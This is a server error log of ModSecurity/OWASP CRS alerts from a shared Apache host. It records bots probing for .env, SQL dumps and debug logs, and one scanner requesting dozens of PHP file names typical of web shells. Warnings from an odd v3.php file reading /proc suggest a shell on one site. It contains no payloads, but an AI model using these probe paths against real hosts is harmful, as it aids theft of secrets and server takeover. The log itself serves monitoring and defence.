[Mon May 11 20:56:06.791324 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/debug.log"] [unique_id "agImRjP5Q_-MBliRCAxoCQAAABY"]
[Mon May 11 20:56:06.791584 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/debug.log"] [unique_id "agImRjP5Q_-MBliRCAxoCQAAABY"]
[Mon May 11 20:56:06.791781 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/debug.log"] [unique_id "agImRjP5Q_-MBliRCAxoCQAAABY"]
[Mon May 11 20:56:06.998600 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/mysql.sql"] [unique_id "agImRlNddpkriGUb6ZV3CgAAARg"]
[Mon May 11 20:56:06.998900 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/mysql.sql"] [unique_id "agImRlNddpkriGUb6ZV3CgAAARg"]
[Mon May 11 20:56:06.999098 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/mysql.sql"] [unique_id "agImRlNddpkriGUb6ZV3CgAAARg"]
[Mon May 11 20:56:07.651208 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/wp_mail_smtp.ini"] [unique_id "agImRzP5Q_-MBliRCAxoEAAAAAI"]
[Mon May 11 20:56:07.651539 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp_mail_smtp.ini"] [unique_id "agImRzP5Q_-MBliRCAxoEAAAAAI"]
[Mon May 11 20:56:07.651763 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp_mail_smtp.ini"] [unique_id "agImRzP5Q_-MBliRCAxoEAAAAAI"]
[Mon May 11 20:56:27.340702 2026] [security2:error] [pid 1511173:tid 1511199] [client 43.160.219.206:37712] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/orgue.html"] [unique_id "agImW_jVc-A-CSptvm1x-AAAAFc"]
[Mon May 11 20:56:36.650431 2026] [:error] [pid 1501883:tid 1501895] [client 47.128.121.241:46646] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:56:41.531991 2026] [authz_core:error] [pid 1501883:tid 1501885] [client 47.128.46.58:27866] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/swiftmailer/swiftmailer/tests/error_log
[Mon May 11 20:56:48.314644 2026] [security2:error] [pid 1502013:tid 1502041] [client 43.133.69.37:57726] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/ile-de-la-reunion-une-alternative-patrimoniale/9"] [unique_id "agImcJYn-x0CHsbEbP2uFgAAAI4"]
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790182/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790182/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790182/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790182/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790182/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790182/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:57:17.076487 2026] [security2:error] [pid 1516058:tid 1516108] [client 123.207.65.62:53108] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agImjSMeXtzav-mi9SyyLgAAANI"]
[Mon May 11 20:57:46.103150 2026] [security2:error] [pid 1502013:tid 1502044] [client 43.153.135.208:58020] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agImqpYn-x0CHsbEbP2uMwAAAJE"]
[Mon May 11 20:58:36.880564 2026] [security2:error] [pid 1502013:tid 1502038] [client 43.157.170.13:55270] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agIm3JYn-x0CHsbEbP2uTwAAAIs"]
[Mon May 11 20:58:40.073120 2026] [security2:error] [pid 1501883:tid 1501905] [client 43.157.170.13:43524] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agIm4DP5Q_-MBliRCAxo3QAAABQ"], referer: http://www.tct-telecom.fr
[Mon May 11 20:58:41.805692 2026] [security2:error] [pid 1511173:tid 1511179] [client 43.157.170.13:47518] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agIm4fjVc-A-CSptvm1yQgAAAEM"], referer: https://www.tct-telecom.fr/
[Mon May 11 20:58:44.090603 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 20:58:44.218866 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/inputs.php
[Mon May 11 20:58:44.347556 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/file.php
[Mon May 11 20:58:44.501978 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/goods.php
[Mon May 11 20:58:44.628681 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/ms-edit.php
[Mon May 11 20:58:44.754554 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/simple.php
[Mon May 11 20:58:44.881729 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/bgymj.php
[Mon May 11 20:58:45.163433 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/404.php
[Mon May 11 20:58:45.295624 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/file3.php
[Mon May 11 20:58:45.428678 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/wp-mail.php
[Mon May 11 20:58:45.558008 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/about.php
[Mon May 11 20:58:45.686646 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/wp.php
[Mon May 11 20:58:45.945968 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/adminfuns.php
[Mon May 11 20:58:46.072555 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/php8.php
[Mon May 11 20:58:46.198881 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/classwithtostring.php
[Mon May 11 20:58:46.324778 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/info.php
[Mon May 11 20:58:46.453202 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/ioxi-o.php
[Mon May 11 20:58:46.582848 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/011i.php
[Mon May 11 20:58:46.708736 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/edit.php
[Mon May 11 20:58:46.835595 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/sid3.php
[Mon May 11 20:58:46.964705 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/load.php
[Mon May 11 20:58:47.091378 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/166.php
[Mon May 11 20:58:47.219387 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/wp-mail.php
[Mon May 11 20:58:47.347931 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/leaf.php
[Mon May 11 20:58:47.474417 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/grsiuk.php
[Mon May 11 20:58:47.601369 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/8.php
[Mon May 11 20:58:47.739603 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/fs.php
[Mon May 11 20:58:47.865921 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/ws38.php
[Mon May 11 20:58:47.999225 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/a7.php
[Mon May 11 20:58:48.131520 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/classsmtps.php
[Mon May 11 20:58:48.258973 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/amax.php
[Mon May 11 20:58:48.389997 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/CDX1.php
[Mon May 11 20:58:48.518564 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/rip.php
[Mon May 11 20:58:48.644691 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/1.php
[Mon May 11 20:58:48.790183 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/chosen.php
[Mon May 11 20:58:48.918726 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/css.php
[Mon May 11 20:58:49.048126 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/php.php
[Mon May 11 20:58:49.175173 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/wp-Blogs.php
[Mon May 11 20:58:49.553289 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/ws83.php
[Mon May 11 20:58:49.678086 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/file61.php
[Mon May 11 20:58:49.802953 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/sadcut1.php
[Mon May 11 20:58:49.927732 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/y.php
[Mon May 11 20:58:50.053034 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/akcc.php
[Mon May 11 20:58:50.444446 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/term.php
[Mon May 11 20:58:50.570353 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/666.php
[Mon May 11 20:58:50.703004 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/7.php
[Mon May 11 20:58:50.830236 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/wp-config-sample.php
[Mon May 11 20:58:50.957970 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/log.php
[Mon May 11 20:58:51.099480 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/a5.php
[Mon May 11 20:58:51.202082 2026] [security2:error] [pid 1502013:tid 1502043] [client 77.83.39.197:54916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agIm65Yn-x0CHsbEbP2uXwAAAJA"]
[Mon May 11 20:58:51.202331 2026] [security2:error] [pid 1502013:tid 1502043] [client 77.83.39.197:54916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agIm65Yn-x0CHsbEbP2uXwAAAJA"]
[Mon May 11 20:58:51.202861 2026] [security2:error] [pid 1502013:tid 1502043] [client 77.83.39.197:54916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIm65Yn-x0CHsbEbP2uXwAAAJA"]
[Mon May 11 20:58:51.230148 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/aa.php
[Mon May 11 20:58:51.357951 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/bolt.php
[Mon May 11 20:58:51.484402 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/x.php
[Mon May 11 20:58:51.610250 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/jga.php
[Mon May 11 20:58:51.739090 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/k.php
[Mon May 11 20:58:51.867660 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/vx.php
[Mon May 11 20:58:52.020847 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/ws77.php
[Mon May 11 20:58:52.154222 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/2.php
[Mon May 11 20:58:52.286113 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/abcd.php
[Mon May 11 20:58:52.730738 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/asd.php
[Mon May 11 20:58:53.013065 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/default.php
[Mon May 11 20:58:53.138002 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/gettest.php
[Mon May 11 20:58:53.263101 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/install.php
[Mon May 11 20:58:53.410777 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/tfm.php
[Mon May 11 20:58:53.537421 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/ws81.php
[Mon May 11 20:58:53.662741 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/222.php
[Mon May 11 20:58:53.787979 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/t.php
[Mon May 11 20:58:54.039656 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/6xBAm3vODE05BSzkJZRAws.php
[Mon May 11 20:58:54.165928 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/a.php
[Mon May 11 20:58:54.294518 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/a1.php
[Mon May 11 20:58:54.420716 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/onclickfuns.php
[Mon May 11 20:58:54.546082 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/w.php
[Mon May 11 20:58:54.959281 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/wp-good.php
[Mon May 11 20:58:55.087329 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/.info.php
[Mon May 11 20:58:55.218194 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/config.php
[Mon May 11 20:58:55.344029 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/item.php
[Mon May 11 20:58:55.471799 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/m.php
[Mon May 11 20:58:55.600563 2026] [:error] [pid 1534836:tid 1534883] [client 52.172.142.96:12985] File does not exist: /home/manhatta/public_html/rh.php
